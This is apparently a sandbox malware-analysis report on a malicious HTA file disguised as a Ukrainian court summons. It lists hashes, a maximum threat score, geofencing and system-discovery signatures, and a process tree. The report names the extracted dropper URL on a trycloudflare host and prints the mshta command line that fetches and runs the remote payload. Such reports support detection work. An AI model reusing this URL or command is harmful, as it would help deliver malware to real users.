Analysis
-
max time kernel
61s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
17/10/2024, 16:14
General
-
Target
420-23015-24_від_10.10.2024/Повістка про виклик до суду в адмініс�.hta
-
Size
498B
-
MD5
458c0be42e9713a6c8210964e7c1e293
-
SHA1
2b0183263f6d7071a02396644947869f4fc159aa
-
SHA256
eaaa84f9d583a55e6ab670690763af007e65382f72ac18b46a58aa3c8c163174
-
SHA512
9293327437e3a14ce3d134b9c508846430ffa10f1eba7252ac8daa9095741197a2b51ee615ca100906db76b3f280fcc905be2f0a045ab9659cbdcc35aaa89508
Score
10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\420-23015-24_від_10.10.2024\Повістка про виклик до суду в адмініс�.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\system32\mshta.exe" https://tent-highly-constant-euro.trycloudflare.com/HZ/relate/base.epub2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
-